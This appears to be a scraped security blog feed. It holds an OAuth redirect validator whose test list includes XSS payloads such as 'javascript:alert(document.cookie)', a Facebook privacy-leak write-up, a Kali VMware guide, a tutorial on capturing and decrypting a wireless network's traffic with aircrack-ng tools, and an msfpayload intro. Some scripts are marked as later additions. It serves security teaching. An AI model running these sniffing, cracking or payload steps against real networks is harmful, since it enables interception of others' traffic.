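    # urlsplit lowercases the scheme, so "JavaScript:" is caught as well.
    if parts.scheme not in ALLOWED_SCHEMES:
        return False, f"scheme {parts.scheme!r} not allowed"
    if not host:
        return False, "missing host"
    if parts.fragment:
        return False, "fragment not allowed"
    return True, "ok"


def resolve_redirect(registered_uris, requested):
    """At authorization time, return the redirect target only if it exactly
    matches a URI registered for the app and still passes validation."""
    if requested in registered_uris and validate_redirect_uri(requested)[0]:
        return requested
    return None


# Constructed candidates: the value from the post, a few variants a lenient
# check might let through, and one legitimate callback.
SAMPLE_URIS = [
    "javascript:alert(document.cookie)//",
    "JavaScript:alert(document.cookie)//",
    "data:text/html,<script>alert(1)</script>",
    " https://app.example.com/cb",
    "https://app.example.com/cb#token",
    "https://app.example.com/cb",
]

if __name__ == "__main__":
    for uri in SAMPLE_URIS:
        ok, reason = validate_redirect_uri(uri)
        print(f"{uri!r}: {'accepted' if ok else 'rejected'} ({reason})")
```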
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">Watch the video below for complete demonstration of attack.</span><br />
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /><iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='320' height='266' src='https://www.youtube.com/embed/bETAtuPteO4?feature=player_embedded' frameborder='0'></iframe></div>
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">(I originally recorded the video in swf and now I couldn't find a decent swf to video converter so I recorded the video of the video :-D)</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">Microsoft fixed this issue pretty quickly and also added my name to the <a href="http://technet.microsoft.com/en-us/security/dn469163" target="_blank">Bounty Honor Roll</a>. That's all for now. Over n out.</span></div>
Unknownnoreply@blogger.com1tag:blogger.com,1999:blog-4538251661335272060.post-68634665160642753572013-12-24T21:30:00.003+05:302014-12-10T22:16:54.920+05:30Facebook, Only Me... really??<div dir="ltr" style="text-align: left;" trbidi="on">
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">In my quest to find bugs on the internet in my free time, I stumbled upon some information disclosure / privacy settings violation issues on Facebook and reported them promptly (after 2 months of discovery :P). Facebook took them seriously and responded promptly (again 1~2 months after the report) and fixed one of them. This entry describes how anyone could find out information which you had entered in your profile but kept hidden (Privacy settings == Only Me) just by becoming your friend. </span><br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">This is going to be the lamest / non-technical bug you are ever going to see. So brace yourself.</span><br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">First, the victim has to set the information which he doesn't want to disclose with privacy settings as "Only Me".</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-ZnfnXNoAJH0/UpA7x1LIL1I/AAAAAAAADqE/knZ_TK7Pr7Q/s1600/2-1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-ZnfnXNoAJH0/UpA7x1LIL1I/AAAAAAAADqE/knZ_TK7Pr7Q/s1600/2-1.PNG" height="240" width="640" /></a></div>
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">Second, the attacker adds the victim as a friend. Remember, for this "attack" to work, the victim has to be the only friend in the attacker's friends list. Either the attacker creates a new profile and adds the victim as a friend, or unfriends everyone but the victim; either works.</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-MBpX-kiR9uQ/UpA_AxroIXI/AAAAAAAADqQ/L__R5Bk5Cdg/s1600/2+-+2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-MBpX-kiR9uQ/UpA_AxroIXI/AAAAAAAADqQ/L__R5Bk5Cdg/s1600/2+-+2.PNG" height="320" width="640" /></a></div>
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">Third, the attacker goes to update his profile. When he clicks on the textbox to enter the information, Facebook, trying to be helpful, conveniently displays suggestions which are nothing but the values the victim has entered and kept private even from his friends. TADA! Privacy violation!!</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-8ooJFdYm3Cs/UpBAy6fGSBI/AAAAAAAADqc/f9pALtoe-2Q/s1600/2-3.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-8ooJFdYm3Cs/UpBAy6fGSBI/AAAAAAAADqc/f9pALtoe-2Q/s1600/2-3.PNG" height="340" width="640" /></a></div>
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">Sometimes being helpful does not mean being nice. </span><br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">No matter how lame, it was a privacy violation. Facebook accepted it and fixed it. Kudos to them. No such helpful suggestions are shown any more if your privacy settings are set to "Only Me".</span><br />
<br /></div>
Unknownnoreply@blogger.com1tag:blogger.com,1999:blog-4538251661335272060.post-2110544723249600742013-07-28T03:09:00.000+05:302013-07-28T03:15:15.110+05:30Installing VMWare Player / Workstation on Kali Linux<div dir="ltr" style="text-align: left;" trbidi="on">
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">This guide is for installing VMware Player or Workstation on Kali Linux. Although this is a simple task, I faced an issue with the kernel headers when launching VMware Player, hence this blog post.</span><br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">I did these steps with VMware Player, but the same steps work for Workstation.</span><br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">1. First of all, download the VMware Player from <a href="https://my.vmware.com/web/vmware/free#desktop_end_user_computing/vmware_player/5_0">https://my.vmware.com/web/vmware/free#desktop_end_user_computing/vmware_player/5_0</a></span><br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">2. Make the downloaded bundle executable: navigate to the directory where you downloaded it and run:</span><br />
<span style="background-color: #eeeeee; font-family: Courier New, Courier, monospace;">chmod +x VMware-Player-5.0.1-894247.x86_64.bundle</span><br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">3. Open a terminal and install the packages VMware Player needs to build its kernel modules:</span><br />
<div>
<span style="background-color: #eeeeee; font-family: Courier New, Courier, monospace;">apt-get install build-essential linux-headers-`uname -r`</span></div>
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">This installs the compiler toolchain and the headers for the running kernel, which VMware needs to build its vmmon and vmnet modules.<br /><br />4. After the packages are installed, start the VMware Player installer (as root, which is the default user on Kali):</span><br />
<div>
<span style="background-color: #eeeeee; font-family: Courier New, Courier, monospace;">./VMware-Player-5.0.1-894247.x86_64.bundle</span></div>
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">This is pretty much it.</span><br />
<div>
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">5. Launch VMware Player from the main menu.</span><br />
<div>
<span style="background-color: #cccccc;"><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><br /></span></span></div>
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">At this stage, I got an error saying that "Kernel headers for kernel version 3.7-trunk-amd64 could not be found."</span><br />
<div>
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">That was strange, because I had the kernel headers for this version already installed.<br /><br />After a little looking around, I found the solution.<br />The VMware module builder looks for utsrelease.h, autoconf.h and version.h in include/linux of the kernel build tree, but the 3.7 headers package generates them under include/generated (version.h under include/generated/uapi/linux since the 3.7 UAPI split), so the check fails even though the headers are installed. Linking them into the place VMware expects solves it:</span><br />
<div style="text-align: left;">
<span style="background-color: #eeeeee; font-family: Courier New, Courier, monospace;">cd /lib/modules/$(uname -r)/build/include/linux </span></div>
<div style="text-align: left;">
<span style="background-color: #eeeeee; font-family: Courier New, Courier, monospace;">sudo ln -s ../generated/utsrelease.h</span></div>
<div style="text-align: left;">
<span style="background-color: #eeeeee; font-family: Courier New, Courier, monospace;">sudo ln -s ../generated/autoconf.h</span></div>
<div style="text-align: left;">
<span style="background-color: #eeeeee; font-family: Courier New, Courier, monospace;">sudo ln -s ../generated/uapi/linux/version.h</span></div>
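The three ln -s commands fail with "File exists" when re-run, and they silently create dangling links if the headers package is laid out differently. As an added example (not from the original post), the shell script below wraps the same fix in a check-then-link form: it verifies the files VMware looks for, creates only the links that are missing, and refuses to link to a target that does not exist. It assumes the include/generated layout of the Debian 3.7 headers described above.

```shell
#!/bin/sh
# Put the generated kernel headers where VMware's module builder looks
# for them (include/linux of the kernel build tree), creating only the
# links that are missing so the script can be re-run safely.
# Added example, not from the original post; it assumes the Debian 3.7-era
# layout where the files live under include/generated.

# "<link to create> <link target>" pairs, relative to the build tree,
# exactly as in the manual ln -s commands above.
header_links() {
    printf '%s\n' \
        'include/linux/utsrelease.h ../generated/utsrelease.h' \
        'include/linux/autoconf.h ../generated/autoconf.h' \
        'include/linux/version.h ../generated/uapi/linux/version.h'
}

# Return 0 when every header VMware needs is reachable under build tree $1
# (a dangling symlink does not count, because -e follows links).
headers_ok() {
    header_links | while read -r link target; do
        [ -e "$1/$link" ] || exit 1
    done
}

# Create the missing links under build tree $1; prints each link created.
# Returns 1 if a link target does not exist (different headers layout).
link_headers() {
    build=$1
    header_links | while read -r link target; do
        if [ -e "$build/$link" ]; then
            continue                        # already there (file or link)
        fi
        if [ ! -e "$build/$(dirname "$link")/$target" ]; then
            echo "missing: $target (headers package layout differs)" >&2
            exit 1
        fi
        ln -s "$target" "$build/$link" && echo "linked $link -> $target"
    done
}

# Stand-alone usage on the real tree (run as root):
#   build=/lib/modules/$(uname -r)/build
#   headers_ok "$build" || link_headers "$build"
```

After the links are in place, relaunch VMware Player (or run vmware-modconfig --console --install-all) so it rebuilds the modules.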
<div>
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">Relaunch VMware Player afterwards and it builds its modules without complaint. Hopefully someone will find this solution useful.</span></div>
</div>
</div>
</div>
Unknownnoreply@blogger.com18tag:blogger.com,1999:blog-4538251661335272060.post-20716189930005438752013-04-12T21:31:00.000+05:302013-04-12T21:31:37.509+05:30Passively Monitoring Network Traffic On Wireless Networks<b id="internal-source-marker_0.507105850847438" style="font-weight: normal;"></b><br />
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<b id="internal-source-marker_0.507105850847438" style="font-weight: normal;"><span style="font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">Many times during penetration tests we need to monitor the data flowing inside a network. On an Ethernet network this seems simple: plug in a cable and you are part of the target network. But a switch only delivers each frame to its destination port, so seeing other hosts' traffic needs a mirror port or an active technique such as ARP spoofing, which generates traffic of its own, makes us accountable, and lets anyone watching the network find out that someone is sniffing.</span></b></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<b id="internal-source-marker_0.507105850847438" style="font-weight: normal;"><span style="font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">On wireless networks we have the advantage of monitoring passively. The frames are already in the air around us; we only need an adapter that can see them, and we never have to transmit a single frame ourselves.</span></b></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<b id="internal-source-marker_0.507105850847438" style="font-weight: normal;"><span style="font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">To capture them, the wireless adapter must be put into monitor mode, which requires a chipset and driver that support it:</span></b></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<b id="internal-source-marker_0.507105850847438" style="font-weight: normal;"><span style="font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">airmon-ng start wlan0</span></b></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<b id="internal-source-marker_0.507105850847438" style="font-weight: normal;"><span style="font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">This starts monitor mode on a virtual interface such as “mon0” (newer aircrack-ng releases rename the interface instead, e.g. to “wlan0mon”; use whatever name airmon-ng reports in the commands below)</span><img height="89px;" src="https://lh4.googleusercontent.com/5sKanJDtbG5s9ur8ipzJpVMNzsRt3JXY8sjYOZmwlFPiSoMI4Irf4fZPoizSQS0hLZYIjj9YuDfDQWqQfL_eSu6q4C93mplimhxcI8HmET1Y5_rB70-aQPTG" width="456px;" /><span style="font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"></span></b></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<b id="internal-source-marker_0.507105850847438" style="font-weight: normal;"><span style="font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">To start dumping data from the target network, we need to know the following two things:</span></b></div>
<b id="internal-source-marker_0.507105850847438" style="font-weight: normal;"><br /><ol style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="font-family: Arial; font-size: 15px; list-style-type: decimal; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Calibri; vertical-align: baseline; white-space: pre-wrap;">BSSID – MAC address of the Access Point</span></div>
</li>
<li dir="ltr" style="font-family: Arial; font-size: 15px; list-style-type: decimal; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="font-family: Calibri; vertical-align: baseline; white-space: pre-wrap;">Channel on which the Access Point is working</span></div>
</li>
</ol>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">To find these, run airodump-ng without a channel lock (airodump-ng mon0) so it hops across all channels. It lists every network it sees with its BSSID, channel, encryption type and associated stations; adding -w scan also writes the same table to scan-01.csv for later use.</span><img height="176px;" src="https://lh4.googleusercontent.com/GenEif75mzKyr9nGWpmCpDIXHlElZ88Fv86r_o3iuw3ALca3i0lkJ-6RXz6lT8Fev6WogeEnYuRaPyHpS5NxMS2hVZiemiQmcQp5dxVovTFt-KiJ_LutIuX2" width="697px;" /><span style="font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"></span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">Once we know the target, we lock airodump-ng (from the aircrack-ng suite) on that access point and channel and write the frames to disk:</span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">airodump-ng --bssid 90:F6:52:30:24:17 -w test_dump -c 1 mon0</span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">This captures only frames to and from the access point with BSSID 90:F6:52:30:24:17 on channel 1 and stores them in files named test_dump-01.cap (plus .csv and .kismet side files). Locking the channel with -c matters: if airodump-ng kept hopping, it would miss most of the target's frames, including the handshake we will need later.</span></div>
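Retyping the BSSID and channel from the screen into the second command is easy to get wrong. As an added example, not part of the original post, the shell functions below read the CSV that airodump-ng writes when the first, channel-hopping scan is run with -w (for instance airodump-ng -w scan mon0 produces scan-01.csv) and build the --bssid/-c arguments for the locked run. The CSV in the block is constructed to match that file's layout: the BSSID 90:F6:52:30:24:17 on channel 1 is the one used in this post, the other rows are made up.

```shell
#!/bin/sh
# Pick the BSSID and channel of a target network out of the CSV that
# airodump-ng writes with -w, so the channel-locked capture run can be
# started without copying values by hand.
# Added example; SAMPLE_CSV is constructed, not a real capture.

SAMPLE_CSV='BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
90:F6:52:30:24:17, 2013-04-12 20:55:01, 2013-04-12 21:02:14,  1,  54, WPA2, CCMP, PSK, -41,       312,        0,   0.  0.  0.  0,   9, TargetNet,
00:11:22:33:44:55, 2013-04-12 20:55:03, 2013-04-12 21:02:10, 11,  54, WEP, WEP, , -67,        98,      413,   0.  0.  0.  0,   6, OldWep,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
AA:BB:CC:DD:EE:FF, 2013-04-12 20:56:40, 2013-04-12 21:01:59, -50,       201, 90:F6:52:30:24:17, TargetNet
'

# Print "<BSSID> <channel>" for the access point whose ESSID is $1,
# reading the airodump-ng CSV from stdin. Prints nothing if not found.
ap_lookup() {
    awk -F',' -v essid="$1" '
        # Access-point rows start with a MAC and have 15 columns; the
        # header row and the station section below it do not match.
        $1 ~ /:/ && NF >= 14 {
            for (i = 1; i <= NF; i++) gsub(/^ +| +$/, "", $i)
            if ($14 == essid) { print $1, $4; exit }
        }'
}

# Build the arguments for the locked capture, e.g.
#   airodump-ng $(airodump_args TargetNet < scan-01.csv) -w test_dump mon0
# Fails instead of returning nothing, so a typo in the ESSID does not
# silently start an unlocked, channel-hopping capture.
airodump_args() {
    ap=$(ap_lookup "$1")
    if [ -z "$ap" ]; then
        echo "ESSID '$1' not found in scan results" >&2
        return 1
    fi
    set -- $ap                      # split "BSSID channel" into $1 $2
    printf '%s %s %s %s\n' --bssid "$1" -c "$2"
}

# Stand-alone demonstration on the constructed CSV:
printf '%s\n' "$SAMPLE_CSV" | airodump_args TargetNet
```

airodump-ng does not quote ESSIDs, so an ESSID containing a comma shifts the columns and simply fails to match; check the CSV by eye in that case rather than trusting the lookup.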
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">After we have captured enough packets we can move on to extracting data from them.</span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">But this task is not as easy as it sounds. </span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">On any protected network the frames in the air are encrypted, and they must be decrypted before other tools can make sense of them.</span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">If we already know the key (and, for WPA, the ESSID), we can decrypt the traffic right away. If we don’t, the steps depend on the type of encryption.</span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">In a WEP network, every frame is encrypted with RC4 under the static WEP key combined with a 24-bit IV that is sent in the clear. Because the IVs repeat and leak key bytes, aircrack-ng recovers the key statistically once enough unique IVs (tens of thousands) have been captured, after which we can decrypt everything.</span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">There are many tutorials on how to crack WEP key, like </span><a href="http://www.aircrack-ng.org/doku.php?id=simple_wep_crack" style="text-decoration: none;"><span style="color: #1155cc; font-family: Calibri; font-size: 15px; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">this one</span></a><span style="font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"></span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">In a WPA/WPA2-PSK network the passphrase itself is never transmitted over the air, which makes it harder to attack. The key to finding the passphrase is the 4-way handshake exchanged when a client joins the network: it carries nonces and a MIC computed from the pre-shared key, which lets aircrack-ng verify passphrase guesses offline. This is a dictionary attack, so a weak passphrase falls and a strong one does not. If we have captured the 4-way handshake, we are good to go and can run aircrack-ng against it. If you haven’t captured a handshake, </span><a href="http://www.aircrack-ng.org/doku.php?id=cracking_wpa" style="text-decoration: none;"><span style="color: #1155cc; font-family: Calibri; font-size: 15px; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">learn how to do that</span></a><span style="font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">.</span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">Assuming we have found the key, we can decrypt the capture made earlier using the airdecap-ng utility.</span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">For WEP networks (-w takes the key in hex, in the form aircrack-ng prints it):</span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">airdecap-ng -w <hex key> test_dump-01.cap</span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">For WPA/WPA2 networks (the ESSID is required as well, because the pairwise master key is derived from the passphrase and the ESSID):</span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">airdecap-ng -e <essid> -p <passphrase> test_dump-01.cap</span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">This creates a file named test_dump-01-dec.cap containing the decrypted packets! One caveat for WPA: each client negotiates its own temporal key during its 4-way handshake, so airdecap-ng can only decrypt the traffic of clients whose handshake is in the capture. Sessions of clients that were already connected when the capture started stay encrypted until they reconnect.</span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">Now we can open this file in Wireshark or extract juicy data from it using tools like </span><span style="font-family: Calibri; font-size: 15px; font-weight: bold; vertical-align: baseline; white-space: pre-wrap;">xplico, chaosreader, tcpxtract</span><span style="font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> etc.</span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">That’s all for passively capturing data over a wireless network. We can do much more once we have all the packets in our hands. More on that later.</span></div>
</b>Unknownnoreply@blogger.com4tag:blogger.com,1999:blog-4538251661335272060.post-6394983258564459972012-02-26T11:19:00.001+05:302014-01-07T09:10:02.391+05:30Collection of CTF writeups<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-e4otge-A6Q0/T0nBdOKuZfI/AAAAAAAAB50/iKsIKj6g4Lk/s1600/129014469823594441.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-e4otge-A6Q0/T0nBdOKuZfI/AAAAAAAAB50/iKsIKj6g4Lk/s400/129014469823594441.jpg" height="358" width="400" /></a></div>
<span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">Last month, I took part in the CTF competition of nullcon. It was great, it was fun, and it was my first CTF. I had practiced a little and was thinking "let's do this and win!!" But when I started playing, it became very clear that the practice you do in-house is far different than what is needed in a CTF. I had no experience of playing a CTF whatsoever and that hurt. After the CTF ended, I started reading writeups of previous CTFs organised at conferences around the world. It is a really enlightening read how creative you have to be at times to figure out how to solve a level. That is why I have collected writeups from various CTF-winning teams. Who knows what trick might give you a winning moment in the next CTF. I present here a few writeups from my collection. Do let me know through the comments if I have missed a good one. Hope you enjoy and learn from them! </span><br />
<ul style="text-align: left;">
<li><a href="http://0x1337.in/?p=114" target="_blank"><span style="font-family: Arial, Helvetica, sans-serif;">Nullcon 2012 HackIM challenge</span></a></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://ppp.cylab.cmu.edu/wordpress/?page_id=46" target="_blank">Plaid Parliament of Pwning</a> << Writeups by team 'ppp' from various competitions.</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://www.defcon.org/html/links/dc-ctf.html" target="_blank">DEFCON Capture The Flag Archive</a></span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://www.vnsecurity.net/2010/05/defcon-18-quals-writeups-collection/" target="_blank">DEFCON 18 Quals Writeups</a></span></li>
<li><a href="http://www.vnsecurity.net/c/capture-the-flag/" target="_blank"><span style="font-family: Arial, Helvetica, sans-serif;">Writeups from VNSecurity</span></a></li>
<li><a href="http://www.plaidctf.com/pctf2011/writeups" target="_blank"><span style="font-family: Arial, Helvetica, sans-serif;">Plaid CTF Writeup list 2011</span></a></li>
<li><a href="https://wiki.mozilla.org/Security/Events/CTF/WriteUp2012" target="_blank"><span style="font-family: Arial, Helvetica, sans-serif;">Mozilla CTF2012 Writeups</span></a></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://leetmore.ctf.su/wp/category/writeups/" target="_blank">Writeups from team leetmore</a></span></li>
<li><a href="https://csawctf.poly.edu/writeups.php" target="_blank"><span style="font-family: Arial, Helvetica, sans-serif;">CSAW 2011 </span></a></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://ictf.cs.ucsb.edu/iCTF2011_We0wnYou_writeup.pdf" target="_blank">iCTF 2011 Winner writeup</a> [PDF]</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://rogunix.com/ctf/hacklu2011.html" target="_blank">Hack.lu 2011</a> </span></li>
</ul>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">UPDATE:</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">The guys over at <a href="http://ctftime.org/">CTFTime.org</a> are doing a great job collecting information about CTFs around the world. You can read many more writeups <a href="https://ctftime.org/writeups" target="_blank">here</a>.</span></div>
</div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-4538251661335272060.post-10646982508905338432011-12-05T21:02:00.001+05:302011-12-05T22:55:02.530+05:30Metasploit's "other" utilities unleashed - I<div dir="ltr" style="text-align: left;" trbidi="on">
Metasploit is a huge tool. When I started learning and playing with it, all I knew was <span style="font-family: 'Courier New', Courier, monospace;">use, set, exploit and run</span>.<br />
That was awesome and I was happy with that. But then I came to know that many Metasploit users don't use the framework to even 50% of its capabilities. So I started exploring the Metasploit directory and lo, so many utilities were sitting there begging me to use them! In this multi-part series, I will introduce all these little gems packed in the Metasploit directory, ready to make your life a lot easier.<br />
<br />
<span style="background-color: #e06666;"><b><span style="font-family: Georgia, 'Times New Roman', serif;">msfpayload</span></b></span><br />
This is a command-line utility of the Metasploit Framework for generating shellcode, or a standalone payload (an executable, DLL, VBA macro or WAR file) that can be delivered to the victim for execution. Its real benefit shows when developing new exploit modules: you can generate a payload in exactly the format your exploit needs and try different payloads and shellcode without going through msfconsole. (Note for readers of newer versions: msfpayload and msfencode were removed from Metasploit in 2015 and replaced by msfvenom, which combines both; the payload names and var=val options below carry over unchanged.)<br />
The syntax for msfpayload is very simple.<br />
<br />
Syntax:<br />
<br />
<span style="background-color: #cccccc; font-family: 'Courier New', Courier, monospace;">Usage: ./msfpayload [<options>] <payload> [var=val] <[S]ummary|C|[P]erl|Rub[y]|[R]aw|[J]s|e[X]e|[D]ll|[V]BA|[W]ar></span><br />
<span style="background-color: #cccccc; font-family: 'Courier New', Courier, monospace;"><br /></span><br />
<span style="background-color: #cccccc; font-family: 'Courier New', Courier, monospace;">OPTIONS:</span><br />
<span style="background-color: #cccccc; font-family: 'Courier New', Courier, monospace;"><br /></span><br />
<span style="background-color: #cccccc; font-family: 'Courier New', Courier, monospace;"> -h Help banner</span><br />
<span style="background-color: #cccccc; font-family: 'Courier New', Courier, monospace;"> -l List available payloads</span><br />
<br />
<span style="font-family: 'Courier New', Courier, monospace;">msfpayload -l</span><br />
Lists all available payloads, as expected.<br />
<br />
<br />
